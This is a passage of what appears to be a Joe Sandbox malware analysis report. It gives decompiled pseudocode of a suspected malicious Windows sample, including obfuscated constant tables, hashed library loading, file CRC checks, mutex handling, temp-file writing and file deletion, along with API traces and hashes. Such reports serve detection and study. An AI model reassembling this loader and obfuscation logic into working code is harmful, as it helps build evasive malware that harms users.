                  				_v620 = 0x2357ceb6;
                  				_v616 = 0x35749835;
                  				_v612 = 0x24a62c8;
                  				_v608 = 0x5593220e;
                  				_v604 = 0x3bac3701;
                  				_v600 = 0x3ed279c7;
                  				_v596 = 0xc38eec75;
                  				_v592 = 0xaa787b27;
                  				_v588 = 0xe66cbef7;
                  				_v584 = 0x3eba0d2d;
                  				_v580 = 0x80721929;
                  				_v576 = 0x647cf0de;
                  				_v572 = 0x6b060840;
                  				_v568 = 0xdb744423;
                  				_v564 = 0x56120815;
                  				_v560 = 0x16cc448e;
                  				_v556 = 0xaf1d3a70;
                  				_v552 = 0x84afcece;
                  				_v548 = 0x1f5b2bac;
                  				_v544 = 0x84987065;
                  				_v540 = 0x923c41c0;
                  				_v536 = 0x62b2d1f2;
                  				_v532 = 0x96e98167;
                  				_v528 = 0x6b9c643e;
                  				_v524 = 0x3bf32bb7;
                  				_v520 = 0x926b56ed;
                  				_v516 = 0xb2212760;
                  				_v512 = 0x3029804a;
                  				_v508 = 0x17afbdc1;
                  				_v504 = 0xe5215b81;
                  				_v500 = 0xa9a73174;
                  				_v496 = 0x38362969;
                  				_v492 = 0x2014a2e5;
                  				_v488 = 0x9bd1543c;
                  				_v484 = 0x9f02550a;
                  				_v480 = 0x70771f01;
                  				_v476 = 0xf57f7493;
                  				_v472 = 0xc2432019;
                  				_v468 = 0xfbc35934;
                  				_v464 = 0x7eef6c55;
                  				_v460 = 0xe5a1e850;
                  				_v456 = 0x95e16117;
                  				_v452 = 0x24148e16;
                  				_v448 = 0x7e86f567;
                  				_v444 = 0xd337dcd3;
                  				_v440 = 0xf1e0035b;
                  				_v436 = 0x7c2fa058;
                  				_v432 = 0xf68afb41;
                  				_v428 = 0xe89fcfb5;
                  				_v424 = 0x58132f2e;
                  				_v420 = 0xeb09708a;
                  				_v416 = 0x5042b9f5;
                  				_v412 = 0xa93c3553;
                  				_v408 = 0x5a85ccd8;
                  				_v404 = 0xad4d5cb9;
                  				_v400 = 0x72223e4b;
                  				_v396 = 0xa39693a8;
                  				_v392 = 0xef1aadfd;
                  				_v388 = 0x6cbdb06a;
                  				_v384 = 0xd7d937f8;
                  				_v380 = 0x596db643;
                  				_v376 = 0x230ce0c7;
                  				_v372 = 0x2d4bd8be;
                  				_v368 = 0xb37400f3;
                  				_v364 = 0x76b2403b;
                  				_v360 = 0xe15bf8ce;
                  				_v356 = 0xfc854871;
                  				_v352 = 0x6777c410;
                  				_v348 = 0xa6813d08;
                  				_v344 = 0x61441dae;
                  				_v340 = 0x7bc73fac;
                  				_v336 = 0xa81f123a;
                  				_v332 = 0x2f60e4b5;
                  				_v328 = 0x4165078e;
                  				_v324 = 0x81b3b60d;
                  				_v320 = 0x2f424b6a;
                  				_v316 = 0xe18acee1;
                  				_v312 = 0x40cb9f46;
                  				_v308 = 0xdcd07e81;
                  				_v304 = 0x77d948c4;
                  				_v300 = 0x8a50f65;
                  				_v296 = 0x69aaae5c;
                  				_v292 = 0x9aa1a84c;
                  				_v288 = 0x1177fe62;
                  				_v284 = 0x215e105a;
                  				_v280 = 0x568272bb;
                  				_v276 = 0x5f8f9ba2;
                  				_v272 = 0xae54d071;
                  				_v268 = 0x6814f89b;
                  				_v264 = 0x256969df;
                  				_v260 = 0x40871313;
                  				_v256 = 0x6ce1575a;
                  				_v252 = 0xbd3d788c;
                  				_v248 = 0x7ca8f87d;
                  				_v244 = 0x85fa53e6;
                  				_v240 = 0xd148325c;
                  				_v236 = 0x5e7ec80d;
                  				_v232 = 0xfdf502b7;
                  				_v228 = 0x2c986a2a;
                  				_v224 = 0xddbf220;
                  				_v220 = 0x4615f74b;
                  				_v216 = 0x5ca4c89f;
                  				_v212 = 0x146daa39;
                  				_v208 = 0xc823a9eb;
                  				_v204 = 0x367ea921;
                  				_v200 = 0xa498042b;
                  				_v196 = 0xca2acd0c;
                  				_v192 = 0xcac29f8f;
                  				_v188 = 0x581c0af8;
                  				_v184 = 0x54e383ca;
                  				_v180 = 0xe1d640da;
                  				_v176 = 0x26176d9b;
                  				_v172 = 0x44ba6c41;
                  				_v168 = 0xc7a769a8;
                  				_v164 = 0x14207816;
                  				_v160 = 0x60a483b3;
                  				_v156 = 0x2ec84207;
                  				_v152 = 0x55861a6c;
                  				_v148 = 0x9395ac55;
                  				_v144 = 0x7b3d468b;
                  				_v140 = 0xd742a34c;
                  				_v136 = 0xba1c8499;
                  				_v132 = 0xeedaef98;
                  				_v128 = 0x6fb05dd;
                  				_v124 = 0x51e8e4bc;
                  				_v120 = 0x78b88ff1;
                  				_v116 = 0xbd2f7124;
                  				_v112 = 0x56393da7;
                  				_v108 = 0xfe67bd5c;
                  				_v104 = 0x6bdb93e9;
                  				_v100 = 0xcd10dc31;
                  				_v96 = 0x10fa8214;
                  				_v92 = 0x66a75e2c;
                  				_v88 = 0xd4e5c57c;
                  				_v84 = 0xd9860dbd;
                  				_v80 = 0x6c05994b;
                  				_v76 = 0x3a6c9168;
                  				_v72 = 0x3ac0a209;
                  				_v68 = 0xeded3b06;
                  				_v64 = 0xc4e5c3d3;
                  				_v60 = 0x7666b774;
                  				_v56 = 0x18554a2e;
                  				_v52 = 0x9ba375a9;
                  				_v48 = 0x4225f3c7;
                  				_v44 = 0x59ee853;
                  				_v40 = 0xbef69b19;
                  				_v36 = 0x369b917b;
                  				_v32 = 0x5d702853;
                  				_v28 = 0x77e322b0;
                  				_v24 = 0x283b69ec;
                  				_v20 = 0x1e83f9c3;
                  				_v16 = 0xacacd89d;
                  				_v12 = 0x5dd1b9f2;
                  				_v8 = 0xedfd234e;
                  				_t186 = E00401A52(0x412360, 0x72fc3a35);
                  				 *0x4164f8 = LoadLibraryW(_t177);
                  				L00401B09(_t186);
                  				_push(0x415490);
                  				_push(0x6ae14ef1);
                  				return E004012FF( *0x4164f8,  &_v704, 0xaf);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
                  				void* _t1;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0);
                  				_t14 = _t1;
                  				if(_t14 != 0xffffffff) {
                  					_t12 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0);
                  					if(_t12 != 0) {
                  						_t10 = MapViewOfFile(_t12, 4, 0, 0, 0);
                  						if(_t10 != 0) {
                  							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
                  							UnmapViewOfFile(_t10);
                  						}
                  						CloseHandle(_t12);
                  					}
                  					return CloseHandle(_t14);
                  				}
                  				return _t1;
                  			}

                  APIs
                  • CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 563 40fb72-40fba0 call 40faa1 call 40f8e6 568 40fba2-40fbac call 401dcb 563->568 569 40fc18-40fc1c 563->569 568->569 572 40fbae-40fbfb call 401a52 call 401b09 call 401d2b 568->572 580 40fbfd-40fc09 CloseHandle * 2 572->580 581 40fc0f-40fc12 CloseHandle 572->581 580->581 581->569
                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				void* _v20;
                  				void* _v24;
                  				char _v544;
                  				char _v1064;
                  				void* _t16;
                  				void* _t39;
                  
                  				_v8 = _v8 & 0x00000000;
                  				E0040FAA1( &_v544);
                  				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
                  				if(_t16 != 0) {
                  					_t16 = E00401DCB( &_v8);
                  					if(_t16 != 0) {
                  						_t39 = E00401A52(0x412e50, 0x55009ce0);
                  						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
                  						_t33 = _t39;
                  						L00401B09(_t39);
                  						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
                  							CloseHandle(_v24);
                  							CloseHandle(_v20);
                  						}
                  						return CloseHandle(_v8);
                  					}
                  				}
                  				return _t16;
                  			}

                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 1860464474-3103284439
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                  				short _v524;
                  				WCHAR* _t34;
                  
                  				_t34 = 0;
                  				E00401000();
                  				if(E0040108B(0x416c50, 0x416840) == 0) {
                  					E00401503( &_v524, 0x104);
                  					GetTempPathW(0x104,  &_v524);
                  					GetTempFileNameW( &_v524, 0, 0,  &_v524);
                  					if(E0040108B(0x416840,  &_v524) != 0) {
                  						_t34 = E0040108B(0x416c50, 0x416840);
                  						_t38 = _t34;
                  						if(_t34 == 0) {
                  							E0040108B( &_v524, 0x416840);
                  						}
                  					}
                  				}
                  				E004010DC(_t38);
                  				return _t34;
                  			}

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 9715921-2032501620
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
                  				long _t3;
                  				void* _t4;
                  				long _t8;
                  				int _t13;
                  
                  				_t13 = 0;
                  				if(E0040C4F5(__eflags) == 0) {
                  					L10:
                  					return _t13;
                  				}
                  				_t3 = WaitForSingleObject( *0x41548c, 0);
                  				if(_t3 == 0) {
                  					L3:
                  					_t4 = E0040C54E(_t17);
                  					_t18 = _t4;
                  					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
                  						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
                  						if(_t8 == 0 || _t8 == 0x80) {
                  							_t13 = ResetEvent( *0x414e6c);
                  						}
                  					}
                  					ReleaseMutex( *0x41548c);
                  					CloseHandle( *0x41548c);
                  					L9:
                  					goto L10;
                  				}
                  				_t17 = _t3 - 0x80;
                  				if(_t3 != 0x80) {
                  					goto L9;
                  				}
                  				goto L3;
                  			}

                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNEL32 ref: 0040C677
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				char _v388;
                  
                  				_v388 = 0xbe363562;
                  				_v384 = 0x358c1795;
                  				_v380 = 0xfc3978bd;
                  				_v376 = 0x5e88d697;
                  				_v372 = 0x1994d9f1;
                  				_v368 = 0x74012195;
                  				_v364 = 0x24e0d58c;
                  				_v360 = 0x21725a8d;
                  				_v356 = 0xa874821;
                  				_v352 = 0x8f4bb96f;
                  				_v348 = 0x7b30fa17;
                  				_v344 = 0x7ea7edad;
                  				_v340 = 0x48c44d52;
                  				_v336 = 0x2e75da4f;
                  				_v332 = 0x5ea70e4c;
                  				_v328 = 0x7310b874;
                  				_v324 = 0x673afa7a;
                  				_v320 = 0x7d7fe55;
                  				_v316 = 0x71d3ba3c;
                  				_v312 = 0x27174315;
                  				_v308 = 0xffc65c5a;
                  				_v304 = 0x71edd81f;
                  				_v300 = 0x88b5759d;
                  				_v296 = 0xa46eb22d;
                  				_v292 = 0x4e080454;
                  				_v288 = 0x773882f0;
                  				_v284 = 0x301340;
                  				_v280 = 0x27b6a846;
                  				_v276 = 0xd1630644;
                  				_v272 = 0x4beaf5bf;
                  				_v268 = 0x430858d;
                  				_v264 = 0xf02d0ada;
                  				_v260 = 0x21f77905;
                  				_v256 = 0xebc6db18;
                  				_v252 = 0x25fcc715;
                  				_v248 = 0x1f40551f;
                  				_v244 = 0xd9b12e44;
                  				_v240 = 0x41ea523d;
                  				_v236 = 0xeff774de;
                  				_v232 = 0x7e0b9da5;
                  				_v228 = 0x8adb486a;
                  				_v224 = 0xf7243b6d;
                  				_v220 = 0x2b80910;
                  				_v216 = 0xca5e3015;
                  				_v212 = 0x635d5a6e;
                  				_v208 = 0x46d9f790;
                  				_v204 = 0xd87c8cb3;
                  				_v200 = 0x3b391a04;
                  				_v196 = 0x80154553;
                  				_v192 = 0x26d9aa35;
                  				_v188 = 0xa780316d;
                  				_v184 = 0xcc58666d;
                  				_v180 = 0x1546d742;
                  				_v176 = 0xb874fe62;
                  				_v172 = 0x7dab30d9;
                  				_v168 = 0xae3670f3;
                  				_v164 = 0x2d39e7a8;
                  				_v160 = 0xc90b32b4;
                  				_v156 = 0xf86c708b;
                  				_v152 = 0x3d938887;
                  				_v148 = 0x857eaf68;
                  				_v144 = 0x4675d760;
                  				_v140 = 0x91021cb0;
                  				_v136 = 0x1e139331;
                  				_v132 = 0x9c4df91c;
                  				_v128 = 0xbf70c7da;
                  				_v124 = 0x1868d50e;
                  				_v120 = 0xaaeeea7a;
                  				_v116 = 0x676c626a;
                  				_v112 = 0x459ef5d;
                  				_v108 = 0xf6552739;
                  				_v104 = 0x628c522d;
                  				_v100 = 0x5094f550;
                  				_v96 = 0xdc8a394;
                  				_v92 = 0x753b5f8f;
                  				_v88 = 0xbcfd75c5;
                  				_v84 = 0xc39d1db2;
                  				_v80 = 0xfc32ffd;
                  				_v76 = 0xd8b5f26a;
                  				_v72 = 0xad049b88;
                  				_v68 = 0xaacdb83e;
                  				_v64 = 0x7a9519fc;
                  				_v60 = 0xa3bb9731;
                  				_v56 = 0x4be3cd7a;
                  				_v52 = 0xeb2ea36c;
                  				_v48 = 0xec09d4a5;
                  				_v44 = 0xf4140a91;
                  				_v40 = 0xb1a460b0;
                  				_v36 = 0x6fde7de0;
                  				_v32 = 0x1da135a9;
                  				_v28 = 0x1a3a8662;
                  				_v24 = 0xfe2095d7;
                  				_v20 = 0xf2fd9e2f;
                  				_v16 = 0xe2f8a12;
                  				_v12 = 0x2f79a8a3;
                  				_v8 = 0x33205105;
                  				_t107 = E00401A52(0x412780, 0x72fc3a35);
                  				 *0x4164f0 = LoadLibraryW(_t98);
                  				L00401B09(_t107);
                  				_push(0x413660);
                  				_push(0x3ccd278a);
                  				return E004012FF( *0x4164f0,  &_v388, 0x60);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
                  				long _v8;
                  				char _v24;
                  				short _v56;
                  				void* _t15;
                  				int _t22;
                  				char _t24;
                  				char* _t33;
                  
                  				_v8 = 0x10;
                  				if(GetComputerNameW( &_v56,  &_v8) == 0) {
                  					L12:
                  					_v24 = 0x58;
                  					L13:
                  					_t15 = E004019AB(0x412e30);
                  					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
                  					return L00401B09(_t15);
                  				}
                  				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
                  				L00401B09(_t19);
                  				if((0 | _t22 > 0x00000000) == 0) {
                  					goto L12;
                  				}
                  				_t33 =  &_v24;
                  				if(_v24 == 0) {
                  					goto L13;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					_t24 =  *_t33;
                  					if(_t24 < 0x30 || _t24 > 0x39) {
                  						if(_t24 < 0x61 || _t24 > 0x7a) {
                  							if(_t24 < 0x41 || _t24 > 0x5a) {
                  								 *_t33 = 0x58;
                  							}
                  						}
                  					}
                  					_t33 = _t33 + 1;
                  				} while ( *_t33 != 0);
                  				goto L13;
                  			}

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  Uniqueness

                  Uniqueness Score: 0.17%

                  C-Code - Quality: 37%
                  			E0040F2EE(void* __eflags) {
                  				char _v524;
                  				char _v1044;
                  				short _v1564;
                  				char* _t17;
                  				void* _t45;
                  
                  				_t42 = E00401A52(0x412a00, 0x4bf67e71);
                  				E0040F190( &_v1044, _t9);
                  				L00401B09(_t42);
                  				_push( &_v524);
                  				_push(0);
                  				_push(0);
                  				if( *0x415f4c == 0) {
                  					 *0x414c14(0, 0x1c);
                  					_t43 = E00401A52(0x412df0, 0x4bf67e71);
                  					_t17 =  &_v524;
                  					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
                  					_t45 = _t45 + 0x14;
                  					L00401B09(_t43);
                  				} else {
                  					 *0x414c14(0, 0x29);
                  				}
                  				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
                  				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
                  				L00401B09(_t44);
                  				return DeleteFileW( &_v1564);
                  			}

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
                  				char _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				void* _t89;
                  				void* _t90;
                  				signed int _t92;
                  				signed int _t93;
                  				signed int _t101;
                  				signed int _t126;
                  				int* _t128;
                  				char _t133;
                  				signed int _t135;
                  				signed int _t136;
                  				void* _t137;
                  				intOrPtr _t139;
                  				signed int _t141;
                  				void* _t142;
                  				signed int _t145;
                  				intOrPtr* _t148;
                  				signed int _t152;
                  				int _t153;
                  				intOrPtr _t154;
                  				int _t155;
                  				void* _t156;
                  
                  				_t148 = __ecx;
                  				_t142 = 8;
                  				if(__ecx == 0) {
                  					L22:
                  					_push(0xfffffffe);
                  					L23:
                  					_pop(_t89);
                  					return _t89;
                  				}
                  				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
                  				if(_t128 == 0) {
                  					goto L22;
                  				}
                  				_t90 = 9;
                  				_t143 =  >  ? _t90 : _t142;
                  				_v20 =  *((intOrPtr*)(__ecx + 4));
                  				_t92 =  *(_t128 + 0x2af8);
                  				_v24 =  >  ? _t90 : _t142;
                  				 *(_t128 + 0x2af8) = 0;
                  				if( *(_t128 + 0xab04) >= 0) {
                  					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
                  					__eflags = _t92;
                  					if(_t92 == 0) {
                  						_t93 =  *(_t128 + 0x2af4);
                  						__eflags = _t93;
                  						if(_t93 == 0) {
                  							while(1) {
                  								_t131 =  *(_t128 + 0x2af0);
                  								_v8 =  *((intOrPtr*)(_t148 + 4));
                  								_v12 = 0x8000 -  *(_t128 + 0x2af0);
                  								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
                  								_t133 = _v8;
                  								 *(_t128 + 0xab04) = _t101;
                  								 *_t148 =  *_t148 + _t133;
                  								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
                  								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
                  								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  								_t135 = _v12;
                  								 *(_t128 + 0x2af4) = _t135;
                  								_t152 =  *(_t148 + 0x10);
                  								__eflags = _t135 - _t152;
                  								_v16 = _t101;
                  								_t153 =  <  ? _t135 : _t152;
                  								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
                  								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
                  								_t156 = _t156 + 0x20;
                  								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
                  								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
